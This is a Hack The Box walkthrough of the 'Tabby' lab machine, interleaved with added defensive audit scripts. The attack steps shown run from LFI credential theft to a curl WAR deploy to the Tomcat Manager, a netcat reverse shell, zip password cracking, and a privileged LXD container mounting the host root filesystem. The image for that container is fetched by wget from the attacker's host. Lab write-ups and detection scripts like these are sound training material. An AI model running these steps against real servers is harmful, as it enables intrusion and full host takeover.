NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 22:45 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating NSE at 22:45
Completed NSE at 22:45, 0.00s elapsed
Initiating Ping Scan at 22:45
Scanning 10.10.10.194 [4 ports]
Completed Ping Scan at 22:45, 0.56s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:45
Scanning tabby.htb (10.10.10.194) [1000 ports]
Discovered open port 22/tcp on 10.10.10.194
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Completed SYN Stealth Scan at 22:45, 2.73s elapsed (1000 total ports)
Initiating Service scan at 22:45
Scanning 3 services on tabby.htb (10.10.10.194)
Completed Service scan at 22:45, 7.34s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against tabby.htb (10.10.10.194)
Retrying OS detection (try #2) against tabby.htb (10.10.10.194)
Initiating Traceroute at 22:45
Completed Traceroute at 22:45, 6.34s elapsed
NSE: Script scanning 10.10.10.194.
Initiating NSE at 22:45
Completed NSE at 22:45, 8.54s elapsed
Initiating NSE at 22:45
Completed NSE at 22:46, 2.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.42s latency).
Not shown: 802 closed ports, 195 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 21 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   ... 20
21  284.13 ms tabby.htb (10.10.10.194)

NSE: Script Post-scanning.
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Initiating NSE at 22:46
Completed NSE at 22:46, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds
           Raw packets sent: 1560 (72.546KB) | Rcvd: 837 (34.270KB)
WEBSITE ENUMERATION
PORT 80
PORT 8080
Running Tomcat, whose Manager application needs a username and password, which we did not have!!
So let's go for the port 80 Mega Hosting part.
After searching for its exploit I did not get the actual exploit, but got the idea that it has LFI.
So here the news part contains an LFI.
So after trying log exploitation I got to know that we cannot have RCE.
GETTING PASSWORDS FOR TOMCAT WEBSITE
Here we see that we have an LFI from which we can get the Tomcat password!!
So first we need to understand Tomcat's directory structure:
https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
I recommend you download Tomcat to check its file structure.
So after going through that directory I got the password for Tomcat.
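The walkthrough stops at "got the password", so here is the defender's side of the same step, as an added example that is not part of the original write-up: Tomcat keeps its Manager accounts in conf/tomcat-users.xml, and two things decide whether an LFI like this one ends in credentials: which accounts hold manager or admin roles, and whether that file is readable by anyone besides its owner. The XML below is a constructed sample with made-up credentials; the function names and the temp-file location are this example's own choices.

```shell
#!/bin/sh
# Added audit script; not part of the original walkthrough. It checks the two
# things that let an LFI turn into Tomcat Manager credentials: which accounts
# hold manager/admin roles in tomcat-users.xml, and whether that file is
# readable by accounts other than its owner. The XML below is a CONSTRUCTED
# sample with made-up credentials; on a real host point the functions at
# $CATALINA_BASE/conf/tomcat-users.xml.

DEMO_DIR="${TMPDIR:-/tmp}/tomcat-audit.$$"
mkdir -p "$DEMO_DIR"
SAMPLE_USERS="$DEMO_DIR/tomcat-users.xml"
cat > "$SAMPLE_USERS" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="Sample-Passw0rd" roles="admin-gui,manager-script"/>
  <user username="reporting" password="Sample-Other" roles="reporting"/>
</tomcat-users>
EOF
chmod 644 "$SAMPLE_USERS"   # deliberately world-readable for the demo

# Print "<username> <roles>" for every user holding a manager-* or admin-* role.
tomcat_privileged_users() {
  grep -o '<user [^>]*>' "$1" \
    | sed -n 's/.*username="\([^"]*\)".*roles="\([^"]*\)".*/\1 \2/p' \
    | awk '$2 ~ /(^|,)(manager|admin)-[a-z]+(,|$)/'
}

# Succeed (exit 0) only when "other" has no read bit on the file.
# GNU stat first, BSD/macOS stat as the fallback.
tomcat_users_file_private() {
  mode=$(stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1")
  other=$(printf '%s' "$mode" | tail -c 1)
  [ $((other & 4)) -eq 0 ]
}

echo "Accounts with manager/admin roles in $SAMPLE_USERS:"
tomcat_privileged_users "$SAMPLE_USERS"
if tomcat_users_file_private "$SAMPLE_USERS"; then
  echo "OK: tomcat-users.xml is not readable by other users"
else
  echo "WARN: tomcat-users.xml is world-readable; any local file read or low-privileged account can take the credentials"
fi
```

On the constructed sample the first function reports only the tomcat account (the reporting user has no manager role), and the permission check fails until the file is tightened to 640 or stricter with the Tomcat service account as owner.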
So let's get our shell,
which was not that easy, as I had to google and take help from forums!!
Because there is no upload area, we have to upload using curl and wget!!
So please do one thing: read the Apache Tomcat 9 documentation, the part about deploying an application.
curl -v -u tomcat:****************** -T test.war 'http://10.10.10.194:8080/manager/text/deploy?path=/test&update=true'
Then we can confirm the deployment using
http://tabby.htb:8080/manager/text/list
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.194] 40170
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$
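From the blue-team side, the deploy above is easy to spot: Tomcat's AccessLogValve writes Apache-style access lines, and a scripted WAR deploy appears as a PUT to /manager/text/deploy (the HTML manager's upload form is a POST to /manager/html/upload). The script below is an added detection example, not part of this walkthrough; the log lines are constructed to mirror the sequence of requests the deploy produces, and the function names are this example's own.

```shell
#!/bin/sh
# Added detection example; not part of the original walkthrough. Tomcat's
# AccessLogValve writes Apache-style access lines, and a scripted WAR deploy
# shows up as a PUT to /manager/text/deploy (the HTML manager's upload is a
# POST to /manager/html/upload). The log lines below are CONSTRUCTED.

DEMO_LOG="${TMPDIR:-/tmp}/tomcat-access-demo.$$.log"
cat > "$DEMO_LOG" <<'EOF'
10.10.14.12 - - [21/Jun/2020:22:50:01 +0530] "GET / HTTP/1.1" 200 11156
10.10.14.12 - - [21/Jun/2020:22:50:05 +0530] "GET /manager/html HTTP/1.1" 403 3022
10.10.14.12 - tomcat [21/Jun/2020:22:51:12 +0530] "PUT /manager/text/deploy?path=/test&update=true HTTP/1.1" 200 54
10.10.14.12 - tomcat [21/Jun/2020:22:51:20 +0530] "GET /manager/text/list HTTP/1.1" 200 212
10.10.14.12 - - [21/Jun/2020:22:52:40 +0530] "GET /test/ HTTP/1.1" 200 0
192.0.2.7 - - [21/Jun/2020:23:01:00 +0530] "GET /docs/ HTTP/1.1" 200 19087
EOF

# Print "<client> <authenticated-user> <method> <path>" for each request that
# hit a Manager deploy endpoint. Field 6 is the method (with its leading quote),
# field 7 the request target; the query string is dropped before printing.
manager_deploy_events() {
  awk '
    { method = substr($6, 2) }
    (method == "PUT" || method == "POST") &&
    $7 ~ /^\/manager\/(text\/deploy|html\/upload)/ {
      split($7, target, "?")
      print $1, $3, method, target[1]
    }' "$1"
}

# Aggregate deploy events per client address; a deploy from an address that
# never deploys is what should page someone.
deploys_per_source() {
  manager_deploy_events "$1" | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }'
}

echo "Manager deploy events:"
manager_deploy_events "$DEMO_LOG"
echo "Per source:"
deploys_per_source "$DEMO_LOG"
```

Run against a real localhost_access_log the same two functions give you the list of deploys and the per-client counts; pair the output with the tomcat-users.xml audit so that a deploy by an account that should only hold manager-script from an unexpected address stands out.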
GETTING USER ACCESS
Let's download linpeas to our shell.
After downloading it and running it in the tmp directory, we found an archive owned by ash, which looks interesting.
So let's get that to our local machine:
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #ls
16162020_backup.zip  liquid.war
To unzip it we need a password, so let's crack it using fcrackzip:
┌─[root@liquid]─[~/Desktop/HTB/tabby]
└──╼ #fcrackzip -D -p ../../THM/Wordlists/rockyou.txt 16162020_backup.zip
possible pw found: ******** ()
So after enumerating through the files I got nothing, so I used this password to su to ash.
Here we go with our user ash:
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
GETTING ROOT ACCESS
So here we go with our usual commands:
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
ash@tabby:~$ sudo -l
sudo: unable to open /run/sudo/ts/ash: Read-only file system
[sudo] password for ash:
Sorry, user ash may not run sudo on tabby.
ash@tabby:~$
But the lxd group membership looks suspicious.
So let's google it.
Here we learn that we can privesc using this:
https://www.hackingarticles.in/lxd-privilege-escalation/
https://book.hacktricks.xyz/linux-unix/privilege-escalation/lxd-privilege-escalation
So just follow all these steps.
But one thing which took me 3 hrs to find my mistake: do this from ash's directory, not from tmp.
As it was not working for me from tmp, I tried from ash's.
FROM YOUR MACHINE
┌─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
└──╼ #ls -l
total 3180
-rw-r--r-- 1 root root 3212312 Jun 21 22:04 alpine-v3.12-x86_64-20200621_2204.tar.gz
-rwxr-xr-x 1 root root    7498 Jun 21 22:03 build-alpine
-rw-r--r-- 1 root root   26530 Jun 21 22:03 LICENSE
-rw-r--r-- 1 root root     768 Jun 21 22:03 README.md
┌─[✗]─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
└──╼ #python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
FROM ASH’S MACHINE
ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
--2020-06-21 17:20:54--  http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
Connecting to 10.10.14.12:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3212312 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.06M  67.4KB/s    in 45s

2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]

ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04

ash@tabby:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| liquid | 1145f55bb6a7 | no     | alpine v3.12 (20200621_22:04) | x86_64       | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
Here you may encounter this error:
Error: No storage pool found. Please create a new storage pool
ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: no
Would you like to connect to a MAAS server? (yes/no) [default=no]: ^C
ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
Would you like to connect to a MAAS server? (yes/no) [default=no]: no
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: liquid
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
THEN JUST GO FURTHER WITH YOUR COMMANDS:
ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
Creating privesc
ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to privesc
ash@tabby:~$ ^C
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root
/mnt/root # ls
bin    home    lost+found  root  swap.img
boot   lib     media       run   sys
cdrom  lib32   mnt         sbin  tmp
dev    lib64   opt         snap  usr
etc    libx32  proc        srv   var
/mnt/root # cd root
/mnt/root/root # wc -c root.txt
33 root.txt
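The whole chain above rests on one fact: membership in the lxd group lets an ordinary user start a privileged container with the host's / mounted inside it, so on the host it is root-equivalent. As an added defensive check that is not part of this walkthrough, the script below reads a file in /etc/group format and reports who holds that membership (docker is included for the same reason). The group file is a constructed sample and the function names are this example's own; point it at /etc/group on a real host.

```shell
#!/bin/sh
# Added audit example; not part of the original walkthrough. Membership in the
# lxd group lets a user start a privileged container with the host's / mounted
# inside it, which is exactly what the lxc commands above do, so defenders
# should know who holds it. The group file below is a CONSTRUCTED sample in
# /etc/group format; pass /etc/group for a real host.

SAMPLE_GROUP="${TMPDIR:-/tmp}/group-demo.$$"
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash,deploy
docker:x:998:
ash:x:1000:
EOF

# Print the members of GROUP from FILE, one per line (nothing if empty/absent).
# Field 4 of /etc/group is the comma-separated member list.
group_members() {
  awk -F: -v g="$2" '
    $1 == g {
      n = split($4, m, ",")
      for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "$1"
}

# Succeed when USER is listed in GROUP.
user_in_group() {
  group_members "$1" "$2" | grep -qx "$3"
}

# lxd and docker both hand their members root on the host via container
# tricks like the one in this walkthrough, so every member is a finding.
for g in lxd docker; do
  for u in $(group_members "$SAMPLE_GROUP" "$g"); do
    echo "WARN: $u is in group $g (root-equivalent on the host)"
  done
done
```

On the sample the loop flags ash and deploy for lxd and nothing for docker. The fix is to drop the membership (gpasswd -d ash lxd) and keep LXD management on an account that is already an administrator, so that the group no longer becomes an unaudited second path to root.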
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE